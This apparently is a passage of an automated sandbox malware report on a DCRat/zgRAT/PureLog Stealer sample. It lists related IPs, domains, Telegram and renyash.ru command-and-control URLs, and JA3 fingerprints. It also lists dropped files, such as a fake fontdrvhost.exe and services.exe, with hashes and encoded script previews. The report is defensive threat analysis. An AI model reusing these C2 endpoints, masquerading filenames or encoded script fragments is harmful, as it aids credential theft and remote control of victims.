149.154.167.220	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	iviewers.dll	Get hash	malicious	LummaC	Browse
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
104.21.38.84	U1jaLbTw1f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
	67VB5TS184.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	34.117.59.81
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	main1.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	pyld611114.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://bu.marcel-andree.de/	Get hash	malicious	Unknown	Browse	34.117.59.81
api.telegram.org	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
CLOUDFLARENETUS	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	104.26.13.60
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	104.21.64.1
	6a7e35.msi	Get hash	malicious	Unknown	Browse	104.21.32.1
	http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1	Get hash	malicious	Unknown	Browse	188.114.97.3
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	vj0Vxt8xM4.exe	Get hash	malicious	Unknown	Browse	104.20.99.10
	vj0Vxt8xM4.exe	Get hash	malicious	Unknown	Browse	104.20.99.10
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	34.117.77.79
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	34.117.77.79
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	34.118.114.163
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	34.117.61.150
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	34.67.61.212
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3d	Get hash	malicious	HTMLPhisher	Browse	34.117.121.53

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	1.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	YJaaZuNHwI.exe	Get hash	malicious	Quasar	Browse	149.154.167.220 34.117.59.81
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220 34.117.59.81
	OPRfEWLTto.js	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.220 34.117.59.81
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	tyPafmiT0t.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	149.154.167.220 34.117.59.81
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220 34.117.59.81

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BimGJlFQ.log	U1jaLbTw1f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	voed9G7p5s.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	KzLetzDiM8.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	f3I38kv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	aimware.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	r6cRyCpdfS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	tBnELFfQoe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Z4D3XAZ2jB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Drivers\5b884080fd4f94

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with very long lines (829), with no line terminators
Category:	dropped
Size (bytes):	829
Entropy (8bit):	5.895863081890059
Encrypted:	false
SSDEEP:	12:0LrGPkTpd7uwOQtLOQ3cU3dmdWQikBo3j8EU5QXhiUrDNQS/rtgwJacDzkJ:0Gs1Nu0PrmdAUyXBHNQM9B4J
MD5:	7D86DD76C4F0B7FFBDB347CFDACCB2D7
SHA1:	659807C29AE5A5A07930725CD536FC3AAF57D28A
SHA-256:	62BEBE49D8EAEA8405DADC19E0E30C5BD88C8AD818A9A57B1B1E9EA2293665EB
SHA-512:	977E3860BE26C29022329E74D50B8CE29938F9078DD5401C30B0492B57644CE890731EA177B83CF3B69B5FFFA8DAAE948EE59E45D4AEF87F34B31D60EEEB9342
Malicious:	false
Preview:	enyXBloxCQBNAibqJHUN9U1EUPj1UPjB9V2wrSnsL5gcFmrSHzTav7zJwuCvCwdwq9Ooqo80dmBEyY8shRuf5JQBgsA7Q1pZbuwFXCld0d7J5uVXvUOvC80htMI7nBkl6mnEm2UepRocLGFwXmL5n3Xd3OWL4ozy2VMTGRu39tGuTXVmGWjA0o8DOKKXgJkAc0kz4vpG2S63xmJg3tEiEy8NXIE6GXW0JFSdwfsUqcIhsEQmAoexFB6o1WcvqsAf5GurUqtXAt1lpafT2c5c2juHJolaD6n8cnmlUiSU4GwVKU9b1J3OwhmVVmiqETUEF2JBy38UKlhwxY7zpKi4DZL5BQQr9mQlwrQRK7m7KiEL90i6ptB4uZBqrNAhnQUiV69FIporhkueV95KsTCQlV0Wqkk77FU3Og0D0cxAFTXKpgUrSzzTOE69FnZiErubQ0QzJ2UPfCLR8qqJP2oIPApKj17NDP5Xj53zQfiafkyL2pBY6PTMCmMPLGQR4GLQHxsDw13tUOmpMdR40iRy5sV6tonKPQfYYiEE67mFWj2x9gDsyWbVzXUYcvUINseDtORnYM726LbW0h7Mk5V3zJjBNqmKnd1nFzEuOZTlYiZn58i4yHhRWlNjpQasjwPcTyRBcM7LmteQu5FPIsWf5kQdlfF89kCmT6THqgblJWpmG7yuKKk1Zththxa7H9LBr26yl8ilQvVi5nXnqVxyAKMkZkj3GeeKKn5NAAIMl9koX8y3awQvLXBhqWYAYpewRLXRsJnpMlMAkiMawqcUNs9xmYholIy6exWMkgKQJljkKA6IJ8OrMKjjLkpUm

C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe

Download File

Process:	C:\Users\user\Desktop\YGk3y6Tdix.exe
File Type:	data
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.855036525984412
Encrypted:	false
SSDEEP:	6:G3wqK+NkLzWbHY08nZNDd3RL1wQJR62Epa872CeE9s:G+MCzWLY04d3XBJDka8yCeEi
MD5:	1284861B32FF60A134809849EA1F67ED
SHA1:	5AD5EB3232A79528A7920CE7FB5C7465EFB4AF84
SHA-256:	CF2177CC131570B6AD9BB432EA0BAB75157FFA3A2370CB5F6B21FF12B1F533C5
SHA-512:	649B46E98D6D8D4E17FE0D3F373F93FA8D8A6E132B9B5F16A04C1FA7EA00E9C9429DF0F1E13343CC2445E63AE82CFCDFC1987A7A53EEAE3E27484BD547A3B5FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&zGDr\.Dd&Jp?9h(.\|%M/sSGD_o8R8CDJSPZSP6lsd.IDwAAA==^#~@.

C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Drivers\QSdmXzK8rClLDrHgb.bat

Download File

Process:	C:\Users\user\Desktop\YGk3y6Tdix.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.945354912419641
Encrypted:	false
SSDEEP:	3:h9ui+/1nsWk6HT6XILRFWCxlBAn:hX+lhk6HT8IlFSn
MD5:	3104AF651851E2A7D94A45F816A42514
SHA1:	769C71E0C70B039167913F223113F5EF1B9ABCCE
SHA-256:	AE6F7225122EF709291F36A89BE112F52FB08C806CBA5123D66F10592D034AF1
SHA-512:	58FEA055F29B0ED6336EA1DE7A82B92BD01646B419FC149C6DE5BACA5F5DA409791B052C4B012ACBDBDFB0BBC67B1890A1079100AC36C6E40773B2DDFF1E48F8
Malicious:	false
Preview:	%TLMPtFda%%GxsxrlTyjGRkGy%..%viRnrcdwVU%"%SystemDrive%\/Drivers/fontdrvhost.exe"%QcWd%

C:\Drivers\f8dafbcfe7f5f1

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with very long lines (662), with no line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.888973933888302
Encrypted:	false
SSDEEP:	12:Jo7gpSgWmlTYEohkCcQORBAgTOePaiE7rro7P0bVlD2:AgppvTYEodBO4gCTiEroIbe
MD5:	ED500393A9F00B18B29A46DE52688D80
SHA1:	2B7745BE740E4477896960F6927AFFCE6114FC85
SHA-256:	0307B9477AAFA7158AEB70B5CDD286963B4AB526D0E49806DE99D9A38E5224BE
SHA-512:	CD076F178B612EFD18EF9DF4CC9CC5E022C647D22119F08E637BE94C2D775590DBBABBC3A97831F75A3618CB2F412484ED6A7A7F0D5E623BDB66802AEDE62248
Malicious:	false
Preview:	6CTVhELp1j0xMMh76EQv3952vuc2DMYh1mkCNmOrRwLR5MygtJbFI2v7GbkwlTloLT6kletUzidGyo7i66I3vTY80n6vCbF8LgGlQN4PZHPkYpJbeB0oKr3157u8h7SXdf5RhVSsC2eoDyjKeeRAlaxdmOqTd5sbz1G3u14JtImSNPyGXjeCqRwCrbpTo8OHKCyMrpankIRdyfPXaj53bpvhFDMSLkeu3fHLalZrJ0ciASOMLS2EDVpeQRGndIb9ngjTXE6yKNulNNhwzAG3rZqizm4JfvOAZc4dt5yHVE4zkERDtUydChRNzBduKxTY9tLvSDD3L9inf17vV0ZL6u81KqnrcD6ivf012fvpQ5RC9os8DrZUYHbOuUkmaVbICA29BG3zFt4Bd52g8onuomKnDlGh5IP4dJA9vs77yjPoNavycEovsrda0P6ZAV46dAiT52uPrq5FXfZnzRF0eeMvpjJgvh7coSKM1c2jTYDCvYDUzTksQEb9xwnWtOdJtcaEUMvXYfhGaKARfyqc7OMk0LYFygzF54SS799mhMTuhVjnwV05hAMeP0NJxqi2qbKf1rUgyE5u5cDelvSdq4h4syCGv0y0obDFKDwEBTHdFbjxxthCXFLw4QxCoNv8PEGdY7Ti8ObWxDyQPPTBSv

C:\Drivers\fontdrvhost.exe

Download File

Process:	C:\Users\user\Desktop\YGk3y6Tdix.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653cc

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	260
Entropy (8bit):	5.809403618528889
Encrypted:	false
SSDEEP:	6:3b72dDzAH/AnhM9OPj0ntBI6qFLxTnDTE6s:3/M1a0QcLxTE6s
MD5:	8D34002758E2DD0FB5D785CD0B5A8922
SHA1:	61197DE8E4F6AE457F7698D99502BC5C17392D1A
SHA-256:	028E09208EF0B517DB8F16CE880B6E1ACE23123333EA8B9D0F7F12E557BA7EDF
SHA-512:	98BA4EEC857C97B0836C49837B633A8ED54242DB75EABF51A9C236D28221BCED5A6FD7740BBE9B91AAEF1BE21257BC3D427E22DC361AD59D2D32B3E52DF16DFD
Malicious:	false
Preview:	uZxiIOBUFYzZ9EJnz91cgxZ4tpdlhNGxZSOyoyozx6J0dmSrT5aSTbs6A2yduZx1SC9rzV8BUBoknibHWvSlxxe7jRxw9KEYIRibml277Y7RxITbbrG8HMDehCHhhMBK7QcVA9ev3UoZ0MKb8WUSEFQ6NE3kdUZuWxTgp8abMUEwiooV1qjL1tF19fH6G3Rj43CC2nvA53FtBeYjaisxuO3nschJ0eUTDf1omlcO4jP7oW0fHigiLezqAZUaGlJajwqg

C:\Program Files\Internet Explorer\SIGNUP\services.exe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... ....~w...{....:....& ....8....~....:.... ....8........~....(K...~....(O... ....<.... ....8m...~....(C... .... .... ....s....~....(G....... ....~w...{....9-...& ....8"...8J..

C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

Download File

Process:	C:\Drivers\fontdrvhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1991168
Entropy (8bit):	7.5618921450859276
Encrypted:	false
SSDEEP:	49152:gj0lqVipoZ4YCZ5I3tChoVtLlNeLi6ZbNIgKZnpN8Z:gj0voZ4YqIdCho9YLi6lG+Z
MD5:	BA58757137700B6B304B45298D986EB1
SHA1:	9C961405DF61C3F031EAC0B5D045EFA6F4BDDC8B
SHA-256:	62B5B15444C303B073C9213E457C7CC4ECC99BC69C850C8350B9F3890C9DD363
SHA-512:	296D17B9F437E12723A04E116B124453F757D2E787E5E2561DB01F2336EEFE02CF30403FFE35A54E46A568D0A2B52B2D1EA6A51824361C75F0B624DD10BFEB30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.pg.................Z..........>y... ........@.. ....................................@..................................x..K....... ............................................................................ ............... ..H............text...DY... ...Z.................. ..`.rsrc... ............\..............@....reloc...............`..............@..B................ y......H..............................cx.......................................0..........(.... ........8........E............9......8....(.... ....~w...{....:....& ....8....(.... ....8....(.... ....~w...{{...9....& ....8........0.......... ........8........E....J...v.......6...........8E...r...ps....z*...... 